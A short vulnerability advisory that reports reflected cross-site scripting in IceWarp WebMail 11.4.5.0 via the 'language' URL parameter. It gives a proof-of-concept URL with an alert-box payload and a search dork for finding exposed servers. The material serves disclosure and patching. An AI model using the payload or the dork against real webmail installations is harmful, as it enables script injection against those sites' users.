[+] Title: IceWarp WebMail Cross-Site Scripting Vulnerability
[+] Date: 2020/10/25
[+] Author: Harun
[+] Vendor Homepage: www.icewarp.com
[+] Tested on: Windows 10
[+] Versions: 11.4.5.0
[+] Vulnerable Parameter: "language" (Get Method)
[+] Vulnerable File: /webmail/
[+} Dork : inurl:/webmail/ intext:Powered by IceWarp Server
# PoC:
[+] Go to : http://localhost/webmail/
or
[+] Add the "language" parameter to the URL and write malicious code, Example: http://localhost/webmail/?language="><img src=x onerror=alert(1)>
[+] When the user goes to the URL, the malicious code is executed
Example Vulnerable URL: http://localhost/webmail/?language="><img src=x onerror=alert(1)> (Payload: "><img src=x onerror=alert(1)>)
example picture
https://i.hizliresim.com/FBcSbW.png